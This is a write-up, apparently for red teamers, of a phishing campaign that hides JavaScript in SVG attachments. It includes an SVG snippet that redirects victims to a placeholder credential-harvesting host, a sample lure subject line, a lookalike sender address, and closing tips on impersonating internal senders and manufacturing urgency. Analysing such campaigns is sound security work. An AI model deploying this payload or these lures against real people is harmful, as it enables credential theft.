New Wave of Phishing Emails Delivering Malicious SVG Files

Campaign or TTP Overview

In recent weeks, security researchers have identified a sophisticated phishing campaign employing a novel tactic: the use of malicious SVG files to deliver malware. These attacks have primarily targeted financial and healthcare sectors, exploiting weaknesses in traditional email security filters. The SVG format, commonly used for vector graphics, is harnessed to embed scripts capable of initiating harmful actions upon opening. The campaign, first observed in early October 2023, has been traced back to a threat actor group known for its expertise in manipulating file formats to evade detection.

The complexity and elegance of this attack lie in its ability to bypass numerous security checks that typically flag or block executable files or scripts. This methodology not only deceives automated filtering systems but also lures unsuspecting users into triggering harmful scripts. As reported by SANS Internet Storm Center, this phishing campaign is an example of how attackers continually develop advanced techniques to compromise security measures and gain unauthorized access.

How It Was Built

The attack infrastructure was meticulously constructed to exploit the inherent trust in SVG files. The delivery mechanism revolves around seemingly innocuous emails that blend in with regular corporate communication. These emails contain an attached SVG file disguising itself as legitimate content, such as a graphical report or a chart.

Subject lines like “Quarterly Performance Report: Immediate Review Required” and sender addresses mimicking internal domains (e.g.,

reports@company-hr.com

) enhance the email’s credibility. Once opened, the SVG file, which includes embedded JavaScript, automatically triggers, forwarding the victim to a phishing page resembling legitimate corporate sites to capture credentials or initiate malware download.


&lt;svg xmlns="http://www.w3.org/2000/svg" width="300" height="200"&gt;

  &lt;script type="application/ecmascript"&gt;

    <![CDATA[

      window.location.href = 'http://malicious-site.com/login';

    ]]&gt;

  &lt;/script&gt;

&lt;/svg&gt;

Why It Worked

Three main components contributed to the effectiveness of this phishing campaign:

Trust in SVG files: SVG files are typically associated with safe, non-executable content. This intrinsic trust enabled the malicious SVG to slip through security solutions that primarily focus on more traditionally exploited formats like PDFs or Word documents.
Realistic sender mimicry: By using lookalike domains and credible sender identities, the attackers successfully impersonated internal communication pathways, reducing suspicion among recipients.
Engaging lure content: The subject lines and email body content were crafted to incite urgency and immediate action, a proven tactic that preyed on recipients’ instincts to react quickly to potential company-related issues.

Operator Takeaways

For a red teamer replicating this level of innovation, focusing on the less monitored vectors can yield significant engagement rates. This campaign highlights the importance of looking beyond conventional exploit formats and reinforcing the legitimacy of phishing bait through engaging and contextually relevant content. Additionally, developing infrastructure that mimics internal communication tools or channels adds an extra layer of deceit that can increase the likelihood of successful payload deployment.

Good / Better / Best

Good: Utilize commonly trusted file formats that have the capacity to contain executable elements. Ensure the file adjacency aligns with the target organization’s common file usage habits.
Better: Employ lookalike domains and credible sender impersonations for maximum plausibility, mirroring the target’s actual communication style and frequency.
Best: Craft multi-layered phishing content that replicates internal pressure or urgency scenarios, enhancing the psychological propensity for targets to engage without due diligence.